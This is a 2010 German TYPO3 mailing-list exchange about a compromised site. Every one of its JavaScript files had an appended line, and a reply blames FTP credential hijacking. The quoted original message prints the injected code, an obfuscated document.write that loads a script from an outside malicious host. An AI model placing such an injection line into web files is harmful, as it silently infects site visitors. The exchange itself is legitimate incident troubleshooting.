[TYPO3-german] Malware in Seite
Jesse.Adler at telekom.de
Jesse.Adler at telekom.de
Thu Oct 21 10:38:34 CEST 2010
Hallo Jan,
> Was meint ihr? Typisches Szenario für augenutze Sicherheitslücke
> (s.o.), oder andere Ursache? Und nach was könnte man in den Apache
> Logfiles suchen um herauszufinden, ob das ganze über TYPO3 reinkam?
Das hört sich für mich eher nach FTP highjacking an. Schau mal in den logfiles nach heftigen FTP Aktivitäten. Bei einem Kunden ist letztens aufgrund eines verseuchten ftp clients die gesamte Seite heruntergeladen, manipuliert und wieder hochgeladen worden. Die komplette TYPO3 Instanz war mit php-code und Javascripten verseucht. Es sah danach aus, als wenn das Script wusste, dass es sich um eine TYPO3 Instanz handelt, weil gezielt die Dateien manipuliert worden sind, die für eine Ausgabe im Frontend sorgen und damit dann weitere Rechner infizieren. Zwischen Download und upload sind nur wenige Minuten vergangen.
Gruß
Jesse
> -----Original Message-----
> From: Jan Kornblum [mailto:jan.kornblum at gmx.de]
> Sent: Thursday, October 21, 2010 9:26 AM
> To: typo3-german at lists.typo3.org
> Subject: [TYPO3-german] Malware in Seite
>
> Hallo Gruppe,
>
> ich hatte gestern eine TYPO3 Installation, in der sämmtlche
> Javascript
> Dateien "infiziert" waren, in jeder Datei war am Ende eine Zeile
> zusätzlicher Code angefügt worden... Im gleichen Webspace
> übrigens auch
> bei einer ganz anderen Seite, ohne TYPO3.
>
> Ich frage mich gerade, ob hier die letzte TYPO3 Sicherheitslücke
> ausgenutzt wurde (das Update wurde nicht frühzeitig eingespielt), um
> das zu bewerkstelligen:
>
> http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/
>
> Allerdings scheint darüber ja kein Schreibzugriff auf den Server
> möglich gewesen zu sein... Oder doch über Umwege? Und dann
> stellt sich
> die Frage, warum *sämltiche* JS-Dateien verändert waren, da muss ja
> aktiv was auf dem Server gelaufen sein um sich zu verbreiten...
>
> Was meint ihr? Typisches Szenario für augenutze Sicherheitslücke
> (s.o.), oder andere Ursache? Und nach was könnte man in den Apache
> Logfiles suchen um herauszufinden, ob das ganze über TYPO3 reinkam?
>
> Für die, die es interessiert, folgender Code war in den Dateien
> ([irgendwas] ist hier Platzhalter):
>
> document.write('<sc'+'ript type="text/javascript"
> src="http://addle.diretctrishta.com:8080/[irgendwas].js"></scr
> i'+'pt>');
>
> Lieben Gruß, Jan
>
>
>
>
More information about the TYPO3-german
mailing list